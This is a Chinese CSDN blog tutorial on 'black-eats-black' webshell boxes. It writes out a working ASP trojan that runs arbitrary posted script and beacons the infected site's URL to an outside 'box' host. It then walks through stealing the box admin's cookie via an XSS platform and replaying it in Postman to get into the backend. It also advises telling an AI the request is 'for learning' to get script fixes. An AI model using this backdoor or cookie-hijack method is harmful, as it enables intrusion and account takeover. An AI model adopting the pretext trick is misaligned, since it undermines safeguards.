webshell箱子+xss反后门+postman进入箱子后台

于 2024-05-15 09:27:39 发布
阅读量411 收藏 10
点赞数 5
文章标签: xss 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_67694318/article/details/138890835
版权

1.webshell箱子和启动的aws 参考这个链接下载 可以正常打开

【webshell箱子】webshell箱子 搭建过程,使用方法,附带所需的下载链接_webshell箱子管理系统-CSDN博客

正常打开之后是这样

登录之后

这样就没问题了 开始操作

2.在后门代码里面写进箱子的后门 这里我找了很久 因为我要在箱子这个虚拟机里做 所以我选择了.asp的木马

要使用到XSS平台 使用办法可以上网搜 这里放个链接应该够用了

XSS平台-仅用于xss安全测试专用 (xssaq.com)

整合之后如下

<%
Dim code
code = Request.Form("code")
%>

<script>
<%= code %>
</script>

<%
Dim u
u = Request.ServerVariables("HTTP_HOST") & Request.ServerVariables("URL")
Response.Write "<script src='http://你的箱子网址/api.asp?url=" & u & "&pass=你找来的XSS代码'></script>"
%>

3.访问这个木马文件 箱子接收到了


我的木马文件是test.asp 如下

4.这个时候看XSS平台 项目里面是不是有记录了

展开 将网址和cookie分别复制到postman

5.postman发送cookie成功登陆后台

postman的下载在官网

Postman API Platform

打开之后是这样

直接点击overview旁边的加号

将网址和Cookie写到对应位置

send

查看底下的preview可以看到网页大概的样子 虽然是乱码 但是能看出成功进入后台了

6.总结&注意要点

建议在虚拟机里做  所以如果.php脚本执行不了 那就换.asp 因为这个时候用的是aws启动的;

脚本如果出错 直接去问ai 可以改对 就说自己用于学习就会回答 ;postman注册可能需要科学上网;

轩子魔
关注
WEBSHELL箱子系统V1.0.rar
03-24
WEBSHELL箱子系统
webshell箱子数据
11-12
webshell箱子数据,全部的密码都是1
[转]中国最大的Webshell后门箱子调查,所有公开大马全军覆没
weixin_30411239的博客
12-19 3306
起因 对这件事情的起因是某天我渗透了一个大站,第二天进webshell时就发现,当前目录出现了新的后门,仔细一查,发现是博彩团伙干的,网站被全局劫持黑帽程序如下代码 set_time_limit(20);error_reporting(0); define('u_b','/'); define('s_u','http:// 107.182.228.74/'); ...
XSS获取管理后台实战
fengling132的专栏
05-02 2663
一直想写可没空写,既然Trojan 整理出来我就发下。其实也就是个类似QQ马发信的代码.request接受数据,然后创建文件流 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33
网络安全学习--014--木马及木马后门的讲解,webshell箱子溯源追踪
隔壁山上小道士的博客
02-07 2106
提示:本文所讨论的技术仅用于研究学习,旨在提高大家信息安全意识,任何人不得将其用于非法目的。 @木马及木马后门的讲解,webshell箱子溯源追踪 一:webshell制作原理 webshell:即web网站后门 getshell:是指拿webshell的过程 1.webshell的种类 一句话木马 小马 大马 打包马 脱裤马 2.一句话木马: 介绍:一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。 这是一个一句话木马,我们把它插入到asp的网页中,然后用菜刀链接一下
webshell箱子webshell箱子 搭建过程,使用方法,附带所需的下载链接
03-31 1761
人在做天在看,举头三尺有神明
Web漏洞-XSS跨站之订单系统实操-WebShell箱子
ran的博客
03-16 1171
到这里我们就可以联想到,我们可以随便从网上下载一些后门,经过自己的加工加入自己的后门代码之后再重新发布到各类社区或者论坛等平台,取一个牛逼点的名字,当别人利用你的后门来对其它网站进行入侵的时候,你就可以同步获取到他的入侵的网站的信息,就相当于别人在帮我们入侵。因为获取到的网站以及密码等信息会发送到箱子后台,所以可以想到在密码或者URL等位置插入XSS代码,当管理员查看信封的时候,就可能会触发XSS代码,从而实现杀。来到网站的后台可以看到刚刚提交的信息被成功上传到了网站的后台
“黑吃黑”webshell箱子
向阳-Y.的博客
11-13 6614
目录“黑吃黑”webshell箱子环境准备马中马预防后门webshellbox “黑吃黑”webshell箱子 什么是webshell箱子?通俗一点的解释: 它可以让你在大马中植入后门,当别人用你植入过后门的大马去获取渗透别的网站时,你的webshellbox信封将会收到别人截获的密码! 环境准备 搭建一个asp的服务器,我们这里选用小旋风进行搭建http://lt.yx12345.com:90/yasuobao/jyx12345xiaoxuanfenglinshiaspfuwuqiminiban.z
WebShell箱子简介与原理
永远是少年
10-27 949
今天继续给大家介绍渗透测试相关知识,本文主要内容是WebShell箱子简介与原理。 一、WebShell箱子简介 二、WebShell箱子部署 三、WebShell箱子原理
WebShell管理中心箱子3.0源码.zip
最新发布
06-17
WebShell管理中心箱子3.0源码,系统采用PHP+MySql搭建 ,数据采用了PhpCms的加密方式,可靠性高 ,全局防注入、XSS等常见入侵方式,安全性高。 源码安装方法 1.新建webshell数据库 2.执行webshell.sql文件 3.上传到网站根目录 4.访问/admin 5.用admin admin登陆 6.修改密码
php在线查杀扫描webshell后门 对接WEBDIR+ Api
10-04
并处理判断返回结果,使在线查杀文件不在是梦想~ ...缺点:每次查杀都需要上传文件到WebDir 并等待返回结果 速度比较慢 需要耐心等待 优点:Api 免费 并且不限制上传文件数量。 WEBDIR+采用先进的动态监测技术,结合...
基于机器学习的 Webshell 检测+源代码+文档说明
11-09
本课题旨在研究机器学习在 Webshell 检测中的应用,以目前应用广泛的服务器端语言 PHP 为例,通过学习和研究 PHP Webshell 在检测中的对抗手段,收集充分的黑白样本用于机器学习模型训练,采用较为有效的方式进行...
第26天:WEB漏洞-XSS跨站之订单及Shell箱子杀记1
08-03
2. **Shell箱子系统XSS盲打**:利用Shell管理工具的输入验证不足,注入XSS,获取服务器控制权。 3. **后台权限维持**:通过XSS保持攻击者的登录状态,即使管理员注销,攻击者仍能控制账户。 ### Session与Cookie...
webshell下LINUX提权+留后门.txt
01-09
Linux系统安全学习
WebShell后门检测与WebShell箱子
永远是少年
10-28 1049
今天继续给大家介绍渗透测试相关知识,本文主要内容是WebShell后门检测与WebShell箱子杀。 一、WebShell后门检测 二、WebShell后门原理 三、WebShell箱子
xss跨站,订单,shell箱子杀记
san3144393495的博客
05-24 929
弹窗1,这是刚刚写的跨站代码语句执行成功了,如果我们写一些可以盗取对方cookie的代码,获取到cookie之后再利用这个cookie去尝试登陆这个后台,可以得到后台的信息,同样后台里面如果说能够进行这个权限提升,我们说的文件上传,尝试文件上传操作拿到网站的webshell,这都是可以进行的后缀操作。这个是可以进行xss漏洞的测试,凡是有这种数据交互的地方,前端有一个数据的接受,后端是数据的显示,这个过程就符合漏洞产生的前提条件,将输入的数据进行个显示,不太推荐那个语句的原因,太明显了,重新访问一下。
WEBSHELL&XSS
LztCode
11-24 718
WebShell webshell就是以asp、 php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页 后门。 黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起, 然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。 隐蔽性强 功能强大 穿越防火墙 无系统日志 大马 功能比较齐全的Webshell,由脚本语言编写, 提供了文件操作、数据库管理、执行命令等功 能,一般代码量比较大
使用pikachu管理工具下的XSS后台进行实战
北冥同学的成长记录笔记
07-29 3556
pikachu管理工具下的XSS后台是一个通过Cookie窃取和利用、钓鱼攻击、键盘行为记录这三个实战型实验来帮助学习者理解XSS漏洞的原理和危害的一个平台。旨在帮助学习者在实战中深入理解理论,从而可以更好的防御XSS漏洞。
xss跳转代码_记一次渗透测试从XSS到Getshell过程(详细到无语)
weixin_39671631的博客
11-22 971
0X00前言前段时间有幸和大佬们参加了一次一周的攻防演练,让我这个菜鸡体验到了红队的感觉。所以打算记录一下其中一个花了三天由xss存储到后台的踩坑过程,希望大佬们多带带。0X01钓鱼到了攻防演练的第二天,早上有个同事和我说这边的一个目标存在存储xss,已经打回了cookie,但是对方开启了http-only无法利用,让我帮忙看看能不能进行钓鱼或者什么的。于是我打开这个站看...
webshell箱子
03-16
Webshell箱子是一种用于存储和管理Webshell的工具,它可以帮助安全研究人员和渗透测试人员更好地管理和利用WebshellWebshell是一种可以在Web服务器上执行命令的恶意脚本,攻击者可以利用Webshell来获取服务器的控制权,从而进行各种恶意活动。Webshell箱子可以帮助安全人员更好地了解和防御这种攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值